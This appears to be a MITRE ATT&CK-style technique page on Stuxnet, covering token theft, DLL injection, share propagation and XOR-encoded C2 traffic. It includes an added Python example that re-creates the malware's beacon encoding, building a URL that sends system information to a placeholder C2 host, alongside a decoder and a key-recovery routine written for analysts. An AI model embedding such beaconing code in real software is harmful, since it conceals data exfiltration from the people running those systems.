Stuxnet
Associated Software Descriptions

Name | Description
---|---
W32.Stuxnet | (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Techniques Used

Domain | ID | Name | Use
---|---|---|---
Enterprise | T1134.001 | Access Token Manipulation: Token Impersonation/Theft | Stuxnet attempts to impersonate an anonymous token to enumerate bindings in the service control manager.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1087.001 | Account Discovery: Local Account | Stuxnet enumerates user accounts of the local host.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1087.002 | Account Discovery: Domain Account | Stuxnet enumerates user accounts of the domain.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | Stuxnet uses HTTP to communicate with a command and control server.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1560.003 | Archive Collected Data: Archive via Custom Method | Stuxnet encrypts exfiltrated data sent via C2 with static 31-byte long XOR keys.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1543.003 | Create or Modify System Process: Windows Service | Stuxnet uses a driver registered as a boot start service as its main load point.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1132.001 | Data Encoding: Standard Encoding | Stuxnet transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1573.001 | Encrypted Channel: Symmetric Cryptography | Stuxnet encodes the system information payload sent to the command and control servers using a one-byte 0xFF XOR key. Stuxnet also uses a 31-byte long static byte string to XOR data sent to command and control servers. The servers use a different static key to encrypt replies to the implant.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1070.004 | Indicator Removal: File Deletion | Stuxnet uses an RPC server that contains a routine for file deletion, and also removes itself from the system through a DLL export that deletes specific files.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1070.006 | Indicator Removal: Timestomp | Stuxnet extracts and writes driver files whose timestamps match those of other legitimate files.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | Stuxnet uses encrypted configuration blocks and writes encrypted files to disk.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1055.001 | Process Injection: Dynamic-link Library Injection | Stuxnet injects an entire DLL into an existing, newly created, or preselected trusted process.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1090.001 | Proxy: Internal Proxy | Stuxnet installs an RPC server for P2P communications.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1021.002 | Remote Services: SMB/Windows Admin Shares | Stuxnet propagates to available network shares.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | Stuxnet schedules a network job to execute two minutes after host infection.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1505.001 | Server Software Component: SQL Stored Procedures | Stuxnet used xp_cmdshell to store and execute SQL code.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1518.001 | Software Discovery: Security Software Discovery | Stuxnet enumerates the currently running processes related to a variety of security products.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1553.002 | Subvert Trust Controls: Code Signing | Stuxnet used a digitally signed driver with a compromised Realtek certificate.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1078.001 | Valid Accounts: Default Accounts | Stuxnet infected WinCC machines via a hardcoded database server password.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Enterprise | T1078.002 | Valid Accounts: Domain Accounts | Stuxnet attempts to access network resources with a domain account's credentials.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
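The three C2 rows above (T1573.001, T1560.003 and T1132.001) describe one encoding chain: system information XORed with 0xFF, the resulting data XORed with a static 31-byte key, and the binary result turned into an ASCII string that travels as a URL parameter, with server replies under a different static key. The following is an added example, not code from the W32.Stuxnet dossier, from ATT&CK, or from the malware itself: it re-creates that chain on the implant side, writes the decoder an analyst would run over captured requests and replies, and shows why a static XOR key gives no confidentiality. The key bytes, the order of the two XOR passes, the use of hex as the ASCII transform, the `index.php?data=` URL shape and the sample system-information record are all constructed assumptions; the page only states the key lengths and the 0xFF value.

```python
"""Re-creation of the Stuxnet-style C2 encoding chain and its decoder (added example).

Assumptions (not from the page): placeholder keys, 0xFF pass applied before the 31-byte
pass, hex as the binary-to-ASCII step, and the request path/parameter name.
"""
from itertools import cycle
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed placeholder keys. Only the length (31) comes from the page.
HOST_KEY = bytes((0x67 + 7 * i) & 0xFF for i in range(31))
SERVER_KEY = bytes((0x3A + 11 * i) & 0xFF for i in range(31))  # reply key, length assumed

# Constructed sample system-information record (>= 31 bytes so the key-recovery
# routine below can recover the whole key from it).
SAMPLE_SYSINFO = b"5.1.2600|WORKSTATION-01|FIELD|WinCC-present=1"


def xor_with(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; applying it twice restores the input."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def build_beacon_url(c2_host: str, sysinfo: bytes) -> str:
    """Implant side: 0xFF pass, 31-byte pass, then ASCII (hex) for the URL parameter."""
    stage1 = xor_with(sysinfo, b"\xff")      # T1573.001: one-byte 0xFF XOR key
    stage2 = xor_with(stage1, HOST_KEY)      # T1560.003: static 31-byte XOR key
    ascii_blob = stage2.hex()                # T1132.001: binary -> ASCII (hex assumed)
    return f"http://{c2_host}/index.php?{urlencode({'data': ascii_blob})}"


def _blob_from_url(url: str) -> bytes:
    """Pull the hex parameter back out of a captured request URL."""
    return bytes.fromhex(parse_qs(urlparse(url).query)["data"][0])


def decode_beacon(url: str) -> bytes:
    """Analyst side: invert the chain (undo the 31-byte pass, then the 0xFF pass)."""
    return xor_with(xor_with(_blob_from_url(url), HOST_KEY), b"\xff")


def decode_reply(body: bytes) -> bytes:
    """Server replies use a different static key with the same XOR primitive."""
    return xor_with(body, SERVER_KEY)


def recover_key(url: str, known_sysinfo_prefix: bytes) -> bytes:
    """Known-plaintext attack on the static key.

    System-information beacons start with predictable fields (OS version, host name),
    so an analyst who guesses at least 31 leading plaintext bytes recovers the full
    31-byte key from a single captured request without the implant's copy of it.
    A shorter guess yields the corresponding prefix of the key.
    """
    blob = _blob_from_url(url)
    stage1 = xor_with(known_sysinfo_prefix, b"\xff")
    return bytes(c ^ p for c, p in zip(blob, stage1))[:31]


if __name__ == "__main__":
    url = build_beacon_url("c2.example.invalid", SAMPLE_SYSINFO)
    print(url)
    print(decode_beacon(url))
    print(recover_key(url, SAMPLE_SYSINFO) == HOST_KEY)
```

`recover_key` is the point of the example for a defender: a repeating XOR key, however long, is recovered from one beacon and one reasonable guess about the plaintext, which is why the ATT&CK entry files this under symmetric "encryption" but analysts treat it as encoding.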
References
- CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.
- Matrosov, A., Rodionov, E., Harley, D., Malcho, J. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.
- Nicolas Falliere, Liam O Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier (Version 1.4). Retrieved September 22, 2017.
- Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.